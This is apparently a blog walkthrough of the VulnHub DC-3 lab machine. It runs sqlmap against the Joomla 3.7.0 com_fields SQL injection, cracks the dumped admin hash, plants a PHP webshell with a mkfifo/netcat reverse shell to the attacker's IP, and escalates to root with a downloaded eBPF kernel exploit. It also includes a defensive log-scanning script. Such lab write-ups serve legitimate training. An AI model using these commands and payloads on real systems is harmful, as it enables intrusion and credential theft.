HKalpa

VulnHub-DC: 3

Target VM: https://www.vulnhub.com/entry/dc-32,312/

I. Identify the objective

Objective: there is only one flag, one entry point and no clues at all.

II. Information gathering

1. Host discovery

Scan the local network to find the target's IP (arp-scan is much faster than nmap for this):

arp-scan -l |grep 192.168.11

┌──(root㉿kali)-[~]
└─# arp-scan -l |grep 192.168.11
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.128
192.168.11.1   00:50:56:c0:00:08       VMware, Inc.
192.168.11.1   00:50:56:fe:d0:93       VMware, Inc. (DUP: 2)
192.168.11.140 00:0c:29:7f:c1:a7       VMware, Inc.
192.168.11.254 00:50:56:e2:e7:c6       VMware, Inc.

Target IP: 192.168.11.140

2. Port scan

Scan all TCP ports with nmap:

nmap -A -Pn -p0-65535 192.168.11.140

┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p0-65535 192.168.11.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-16 08:32 CST
Nmap scan report for 192.168.11.140
Host is up (0.00082s latency).
Not shown: 65535 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:7F:C1:A7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.82 ms 192.168.11.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.39 seconds

3. Service discovery

The target exposes only a web service on port 80, running the Joomla CMS.

4. Web path brute-forcing

Note that the unquoted * in this command is expanded by the shell before dirsearch sees it, which is why the scanner reports "Extensions: admin" below (a file named admin exists in the working directory).

dirsearch -u 192.168.11.140 -e * -x 403

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.140 -e * -x 403

_|. _ _ _ _ _ _|_   v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: admin | HTTP method: GET | Threads: 30 | Wordlist size: 9006

Output File: /root/.dirsearch/reports/192.168.11.140_23-03-16_09-43-26.txt

Error Log: /root/.dirsearch/logs/errors-23-03-16_09-43-26.log

Target: http://192.168.11.140/

[09:43:26] Starting:
[09:43:28] 200 -   18KB - /LICENSE.txt                                      
[09:43:29] 200 -   4KB - /README.txt                                      
[09:43:31] 301 - 324B - /administrator -> http://192.168.11.140/administrator/
[09:43:31] 200 -   2KB - /administrator/includes/                          
[09:43:31] 200 -   31B - /administrator/cache/                            
[09:43:31] 200 -   5KB - /administrator/                                  
[09:43:31] 301 - 329B - /administrator/logs -> http://192.168.11.140/administrator/logs/
[09:43:31] 200 -   31B - /administrator/logs/                              
[09:43:32] 301 - 314B - /bin -> http://192.168.11.140/bin/              
[09:43:32] 200 -   31B - /bin/                                            
[09:43:32] 301 - 316B - /cache -> http://192.168.11.140/cache/          
[09:43:32] 200 -   31B - /cache/                                          
[09:43:32] 200 -   31B - /cli/                                            
[09:43:32] 301 - 321B - /components -> http://192.168.11.140/components/
[09:43:32] 200 -   31B - /components/
[09:43:33] 200 -   0B - /configuration.php                                
[09:43:35] 200 -   3KB - /htaccess.txt                                    
[09:43:35] 301 - 317B - /images -> http://192.168.11.140/images/        
[09:43:35] 200 -   31B - /images/                                          
[09:43:35] 200 -   31B - /includes/                                        
[09:43:35] 301 - 319B - /includes -> http://192.168.11.140/includes/    
[09:43:35] 200 -   7KB - /index.php                                        
[09:43:36] 301 - 319B - /language -> http://192.168.11.140/language/    
[09:43:36] 200 -   31B - /layouts/                                        
[09:43:36] 301 - 320B - /libraries -> http://192.168.11.140/libraries/  
[09:43:36] 200 -   31B - /libraries/                                      
[09:43:36] 301 - 316B - /media -> http://192.168.11.140/media/          
[09:43:36] 200 -   31B - /media/                                          
[09:43:37] 301 - 318B - /modules -> http://192.168.11.140/modules/      
[09:43:37] 200 -   31B - /modules/                                        
[09:43:38] 301 - 318B - /plugins -> http://192.168.11.140/plugins/      
[09:43:38] 200 -   31B - /plugins/                                        
[09:43:39] 200 - 836B - /robots.txt.dist                                  
[09:43:41] 200 -   31B - /templates/                                      
[09:43:41] 200 -   0B - /templates/system/                                
[09:43:41] 200 -   31B - /templates/index.html                            
[09:43:41] 200 -   0B - /templates/beez3/                                
[09:43:41] 301 - 320B - /templates -> http://192.168.11.140/templates/  
[09:43:41] 200 -   0B - /templates/protostar/                            
[09:43:41] 301 - 314B - /tmp -> http://192.168.11.140/tmp/              
[09:43:41] 200 -   31B - /tmp/                                            
[09:43:42] 200 -   2KB - /web.config.txt                                  

Task Completed

Reading /robots.txt.dist reveals the back-end login page at http://192.168.11.140/administrator/.

/templates/beez3/ and /templates/protostar/ are presumably the template directories.

5. Web reconnaissance

The home page states that the box has only one flag, and that obtaining it requires root.

6. Vulnerability discovery

Scan with joomscan, the Joomla-specific scanner:

joomscan -u http://192.168.11.140/


  ____ _____ _____ __ __ ___   ___   __   _ _
  (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)(   )(_)( )(_)( )   ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                      (1337.today)

  --=[OWASP JoomScan
  +---++---==[Version : 0.0.7
  +---++---==[Update Date : [2018/09/23]
  +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
  --=[Code name : Self Challenge
  @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.11.140/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.11.140/administrator/components
http://192.168.11.140/administrator/modules
http://192.168.11.140/administrator/templates
http://192.168.11.140/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.11.140/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.11.140/                                                                      

This shows the basic Joomla details, including the version.

Check searchsploit for a usable exploit:

searchsploit Joomla 3.7.0

┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                             | Path
------------------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                 | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                             | php/webapps/43488.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is one SQL injection and one XSS. The SQL injection is clearly the more promising route to the administrator's credentials and the back end.

III. Vulnerability analysis

Locate and open php/webapps/42033.txt:

locate php/webapps/42033.txt

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# locate php/webapps/42033.txt
/usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
  Type: boolean-based blind
  Title: Boolean-based blind - Parameter replace (DUAL)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

  Type: error-based
  Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

The advisory gives the exact sqlmap command to run against the list[fullordering] parameter to enumerate the database.
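As an added defender-side example (not part of the original write-up), the following Python scans Apache combined-format access log lines for com_fields requests whose list[fullordering] value carries SQL instead of a plain "column ASC|DESC" ordering, which is the shape of the CVE-2017-8917 payloads quoted above. The log lines are constructed for the example; the combined log layout and the benign ordering pattern are assumptions.

```python
"""Detect CVE-2017-8917-style com_fields ordering injection in Apache logs.

Added example, not part of the original write-up. SAMPLE_LOG is constructed;
the combined-log layout and the benign "column ASC|DESC" shape are assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log prefix: client, ident, user, [timestamp], "METHOD path PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# What Joomla legitimately puts in list[fullordering]: a column, optionally ASC/DESC.
SAFE_ORDERING = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)

# Fragments that appear in the exploit-db / sqlmap payloads quoted in the advisory.
SQL_MARKERS = ("updatexml", "extractvalue", "select", "sleep(",
               "case when", "union", "floor(rand")


def analyse_request(path: str):
    """Return a finding for a com_fields request whose ordering is not a plain
    column/direction, or None for anything else."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if query.get("option", [""])[0] != "com_fields":
        return None
    # parse_qs URL-decodes both the key (list%5Bfullordering%5D) and the value.
    for value in query.get("list[fullordering]", []):
        value = value.strip()
        if not value or SAFE_ORDERING.match(value):
            continue
        lowered = value.lower()
        markers = [m for m in SQL_MARKERS if m in lowered]
        return {"value": value, "markers": markers}
    return None


def scan_log_lines(lines):
    """Parse each line; collect findings with client IP, timestamp and status."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m.group("path"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"), status=int(m.group("status")))
            findings.append(finding)
    return findings


# Constructed sample: one benign ordering, two injection attempts, one unrelated request.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Mar/2023:09:50:01 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [16/Mar/2023:09:51:13 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%27 HTTP/1.1" 500 2310 "-" "Mozilla/5.0"
192.0.2.77 - - [16/Mar/2023:09:51:14 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(SELECT+*+FROM+(SELECT(SLEEP(5)))GDiu) HTTP/1.1" 200 7001 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Mar/2023:09:52:00 +0800] "GET /administrator/ HTTP/1.1" 200 5004 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} status={f['status']} markers={f['markers']} value={f['value']!r}")
```

The benign request is accepted because its ordering matches the column/direction shape, while both injection attempts are reported even though one of them returned HTTP 200.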

IV. Exploitation

1. SQL injection

1.1 Enumerate databases

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

The joomladb database is found.

1.2 Enumerate tables

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks   |
| #__banners         |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments   |
| #__bsms_locations   |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series     |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers   |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics     |
| #__bsms_update     |
| #__categories       |
| #__contact_details |
| #__content_frontpag |
| #__content_rating   |
| #__content_types   |
| #__content         |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups   |
| #__fields_values   |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens   |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages       |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules         |
| #__newsfeeds       |
| #__overrider       |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas         |
| #__session         |
| #__tags             |
| #__template_styles |
| #__ucm_base         |
| #__ucm_content     |
| #__ucm_history     |
| #__update_sites_ext |
| #__update_sites     |
| #__updates         |
| #__user_keys       |
| #__user_notes       |
| #__user_profiles   |
| #__user_usergroup_m |
| #__usergroups       |
| #__users           |
| #__utf8_conversion |
| #__viewlevels       |
+---------------------+

The #__users table is found.

1.3 Enumerate columns

Note:

  • When sqlmap asks whether to use the common column existence check, answer y explicitly; just pressing Enter through the prompts yields no columns.

  • Press Enter to accept the default dictionary "/usr/share/sqlmap/data/txt/common-columns.txt".

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

The columns id, name, password and username are found.

1.4 Dump the column contents

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]

Database: joomladb
Table: #__users
[1 entry]
+-----+-------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+-------+--------------------------------------------------------------+----------+
| 629 | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin |
+-----+-------+--------------------------------------------------------------+----------+

The password is stored as a hash rather than in clear text.

2. Cracking the hash

2.1 Save the hash

Save the hash to a file named admin:

vi admin

┌──(root㉿kali)-[~]
└─# vi admin

┌──(root㉿kali)-[~]
└─# cat admin
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

2.2 Crack with john

Note: the hash had already been cracked once here, so the show option is used to display the stored result.

john admin

john -show admin

┌──(root㉿kali)-[~]
└─# john admin
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[~]
└─# john -show admin
?:snoopy

1 password hash cracked, 0 left

Cracked result: snoopy

Username: admin

Password: snoopy

2.3 Log in to the back end

The credentials log in successfully to the administrator back end at http://192.168.11.140/administrator/.

3. File upload

3.1 Upload the file

Once in the back end, upload a webshell by editing a template.

Extensions --> Templates --> Templates

Either template works; here the Beez3 template is edited.

In the html directory, create a file named shell.php (create, then save) with the following content:

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.128 6666 >/tmp/f");?>

3.2 Reverse shell

To trigger the webshell its path must be known. The path brute-force earlier exposed the template directories, and since the beez3 template was edited the path should be:

http://192.168.11.140/templates/beez3/

That returns a blank page; combining it with the directory the template editor showed, try http://192.168.11.140/templates/beez3/html

The uploaded shell.php is listed there. Start a listener on Kali:

nc -lvnp 6666

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...

Request shell.php:

http://192.168.11.140/templates/beez3/html/shell.php

After the request the connection comes back and a shell is obtained.

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.11.128] from (UNKNOWN) [192.168.11.140] 37608
/bin/sh: 0: can't access tty; job control turned off
$

V. Privilege escalation

The root home directory is not accessible, so the next step is to find a way to escalate privileges.

$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/templates/beez3/html
$ cd /root
/bin/sh: 6: cd: can't cd to /root

1. Obtain the exploit

A note on the lsb_release command:

LSB stands for Linux Standard Base; lsb_release prints the LSB information (distributor, release, codename) for the specific Linux distribution.

Note: on a minimal CentOS installation the command is not present by default and has to be installed before it can be used.

1.1 Check the kernel and distribution

uname -a

lsb_release -a

$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial

1.2 Search for kernel vulnerabilities

Search for kernel vulnerabilities affecting Ubuntu 16.04 LTS on kernel 4.4.0-21-generic:

searchsploit 4.4. Ubuntu 16.04

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalatio | linux/local/39772.txt

1.3 Locate and view the file

locate linux/local/39772.txt

vi /usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# locate linux/local/39772.txt
/usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# vi /usr/share/exploitdb/exploits/linux/local/39772.txt

1.4 Download the exploit

The last line of the file gives the download link for the exploit:

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

┌──(root㉿kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-03-16 18:27:08-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7025 (6.9K) [application/octet-stream]
正在保存至: “39772.zip”

39772.zip 100%[=====================================================>] 6.86K --.-KB/s 用时 0.005s

2023-03-16 18:27:11 (1.33 MB/s) - 已保存 “39772.zip” [7025/7025])

2. Transfer the exploit to the target

Start an HTTP server on Kali:

python -m http.server 8888

┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

On the target, download 39772.zip into /tmp:

cd /tmp

wget 192.168.11.128:8888/39772.zip

$ cd /tmp
$ pwd
/tmp
$ wget http://192.168.11.128:8888/39772.zip
--2023-03-16 20:29:14-- http://192.168.11.128:8888/39772.zip
Connecting to 192.168.11.128:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

0K ...... 100% 1.92G=0s

2023-03-16 20:29:14 (1.92 GB/s) - '39772.zip' saved [7025/7025]

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 16 20:29 f
drwx------ 3 root root 4096 Mar 15 19:16 systemd-private-eebb69eeaac946d088ae7471b81b6ac6-systemd-timesyncd.service-oySBFs
drwx------ 2 root root 4096 Mar 15 19:16 vmware-root

3. Local privilege escalation

Next, unpack, compile and run the exploit to obtain root.

3.1 Unpack the exploit

Unzip 39772.zip, enter the 39772 directory, then extract exploit.tar to get the ebpf_mapfd_doubleput_exploit directory.

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 17 10:22 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ ls -l
total 24
drwxr-xr-x 2 www-data www-data 4096 Aug 16 2016 39772
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
drwxrwxr-x 3 www-data www-data 4096 Aug 16 2016 __MACOSX
prw-r--r-- 1 www-data www-data 0 Mar 17 10:23 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ cd 39772
$ ls -l
total 32
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls -l
total 36
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 ebpf_mapfd_doubleput_exploit
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar

3.2 Run the exploit

  • The extracted files have no execute permission, so grant it first.

  • Enter the ebpf_mapfd_doubleput_exploit directory.

  • Build with compile.sh.

  • Run the compiled doubleput binary.

  • The message "we have root privs now..." confirms root privileges.

ls -Rl ebpf_mapfd_doubleput_exploit

chmod -R 777 ebpf_mapfd_doubleput_exploit

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

$ ls -Rl ebpf_mapfd_doubleput_exploit
ebpf_mapfd_doubleput_exploit:
total 20
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ chmod -R 777 ebpf_mapfd_doubleput_exploit
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls -l
total 52
-rwxrwxrwx 1 www-data www-data 155 Apr 26 2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 Mar 17 10:36 doubleput
-rwxrwxrwx 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rwxr-xr-x 1 www-data www-data 8028 Mar 17 10:36 hello
-rwxrwxrwx 1 www-data www-data 2186 Apr 26 2016 hello.c
-rwxr-xr-x 1 www-data www-data 7524 Mar 17 10:36 suidhelper
-rwxrwxrwx 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Privilege escalation succeeded.

VI. Post-exploitation (find the flag)

The flag is in root's home directory:

cd /root

cat the-flag.txt

cd /root
ls -l
total 4
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

That completes the box. Game over OVO

Author: Kalpa

Link: https://www.cnblogs.com/HKalpa/p/17225373.html

Copyright notice: all operations in this article were performed in a lab environment; any other use is at your own risk and the author bears no responsibility. Licensed under a China Mainland license agreement.
